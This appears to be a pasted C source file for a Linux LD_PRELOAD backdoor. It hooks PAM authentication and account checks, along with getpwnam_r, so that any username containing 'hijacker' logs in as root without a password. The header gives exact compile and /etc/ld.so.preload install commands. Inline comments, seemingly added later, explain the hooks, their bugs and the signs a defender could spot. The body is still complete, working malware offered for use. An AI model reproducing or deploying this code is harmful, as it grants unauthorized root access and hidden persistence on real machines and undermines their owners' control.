LinuxBypassSO.c
  1. /*
  2.         Filename:       LinuxBypassSO.c
  3.         Author:         Goodies (gumshoe on IRCs)
        Description:    This is a backdoor with the purpose of hijacking the Linux authentication functions
                        and the functions that parse /etc/passwd to allow a non-existent account root access
                        without a password or authentication. This is a backdoor and must be run as root at
                        some point. If you lose root access but have access to a local account, you will be
                        able to sign in and achieve root access easily. This will also be used in the future
                        to allow SSH logins (which requires more functions to be hooked).
  10.  
  11.  
  12.         Usage Examples:
  13.                 From Root:
  14.                    gcc -shared -fPIC -o ./bypass.so LinuxBypassSO.c -ldl
  15.                    echo "`pwd`/bypass.so" > /etc/ld.so.preload
  16.                 From Any Account:
  17.                    su - hijacker
  18.                 # root @ Linux acheived #
  19.  
  20. */
  21.  
  22. #define _GNU_SOURCE
  23. #include <stdio.h>
  24. #include <stdlib.h>
  25. #include <pwd.h>
  26. #include <dlfcn.h>
  27. #include <security/pam_appl.h>
  28. #include <security/pam_modules.h>
  29. #include <string.h>
  30.  
#define HIJACK_LOGIN    "hijacker"      /* name the hooks below map to root; matched with strstr(), i.e. as a substring */
#define AUTHOR      "Goodies" //@GoodiesHQ on Twitter -- not referenced anywhere else in this file

/* Saved pointers to the real implementations, filled in by init() via
 * dlsym(RTLD_NEXT, ...). These three names are exactly the symbols this object
 * exports in place of libpam/libc; a preloaded object that exports any of them
 * is the interposition indicator a defender looks for. */
static int (*old_pam_authenticate)(pam_handle_t*, int);
static int (*old_getpwnam_r)(const char*, struct passwd*, char*, size_t, struct passwd**);
static int (*old_pam_acct_mgmt)(pam_handle_t*, int);
/* strdup()'d copies of HIJACK_LOGIN and "root", allocated in init() and never freed. */
static char *hijacker = NULL, *r00t = NULL;
  38.  
/* Runs automatically when this object is mapped into a process (e.g. through
 * /etc/ld.so.preload as described in the header), before that process's own
 * code: sets up the match string and resolves the real implementations of the
 * three symbols this object shadows. */
__attribute__((constructor)) void init(){
        /* The three tests are redundant: `!hijacker` already covers NULL, and
         * strcmp() is non-zero for any non-empty string, so only an empty
         * string would skip the assignment. At load time both globals are NULL,
         * so this is just a strdup() of the two constants. The strdup() results
         * are not checked; a NULL here is later passed to strstr() by the hooks. */
        if(!hijacker || strcmp(hijacker, "") || hijacker == NULL)
                hijacker = strdup(HIJACK_LOGIN);
        if(!r00t || strcmp(r00t, "") || r00t == NULL)
                r00t = strdup("root");
        /* RTLD_NEXT resolves the next definition of the name after this object
         * in the link-map order, i.e. the genuine libpam/libc entry point. None
         * of the dlsym() results is checked, so a failed lookup becomes a call
         * through a null pointer in the corresponding hook. The resulting
         * bindings can be observed with LD_DEBUG=bindings on the affected process. */
        if(!old_pam_authenticate)
                old_pam_authenticate = dlsym(RTLD_NEXT, "pam_authenticate");
        if(!old_getpwnam_r)
                old_getpwnam_r = dlsym(RTLD_NEXT, "getpwnam_r");
        if(!old_pam_acct_mgmt)
                old_pam_acct_mgmt = dlsym(RTLD_NEXT, "pam_acct_mgmt");
}
  51.  
/* Interposes libc's getpwnam_r(). A lookup whose name contains the hijack
 * string is answered with root's passwd entry instead; every other name is
 * passed through unchanged. Callers that reach this exported symbol therefore
 * see uid 0 / gid 0 for an account that is not in /etc/passwd -- a name that
 * is absent from the file yet still resolves is the observable symptom. */
int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result){
        /* strstr() is a substring match, so any name containing the string
         * (not only an exact match) is redirected; a NULL name is dereferenced
         * without a check. */
        if(strstr(name, hijacker)){
                /* Redundant on success: the call below fills *pwd from root's
                 * entry, which already carries gid 0. */
                pwd -> pw_gid = 0;
                return old_getpwnam_r(r00t, pwd, buf, buflen, result);
        }else
                return old_getpwnam_r(name, pwd, buf, buflen, result);
}
  59.  
/* Interposes pam_authenticate(). For a PAM_USER containing the hijack string
 * the real module stack is never run, so no credential is checked and whatever
 * the configured modules would normally log for that attempt is absent
 * (which modules, and what they log, depends on the PAM configuration);
 * every other user is handed to the genuine function. */
int pam_authenticate(pam_handle_t *pamh, int flags){
        void *pam_user = NULL;          // populated in pam_get_item
        /* Return value ignored: if the item is unset or the call fails,
         * pam_user stays NULL and strstr() below dereferences it. */
        pam_get_item(pamh, PAM_USER,(const void**)&pam_user);
                                        // Gets the username parameter passed
        if(strstr(pam_user, hijacker))  // substring match, same as in getpwnam_r
                return PAM_SUCCESS;     // If the user passed is HIJACK_LOGIN, return success message
        return old_pam_authenticate(pamh, flags);
        // otherwise, return the legitimate success/error
}
  69.  
/* Interposes pam_acct_mgmt(). Identical to pam_authenticate() above except for
 * the function it calls through: account validity checks (expiry, access
 * restrictions, and any logging the configured modules do) are skipped for a
 * PAM_USER containing the hijack string, and run normally for everyone else. */
int pam_acct_mgmt(pam_handle_t *pamh, int flags){
        void *pam_user = NULL;          // populated in pam_get_item
        /* Return value ignored: an unset item leaves pam_user NULL and
         * strstr() below dereferences it. */
        pam_get_item(pamh, PAM_USER,(const void**)&pam_user);
                                        // Gets the username parameter passed
        if(strstr(pam_user, hijacker))  // substring match, same as in getpwnam_r
                return PAM_SUCCESS;     // If the user passed is HIJACK_LOGIN, return success message
        return old_pam_acct_mgmt(pamh, flags);
        // otherwise, return the legitimate success/error
}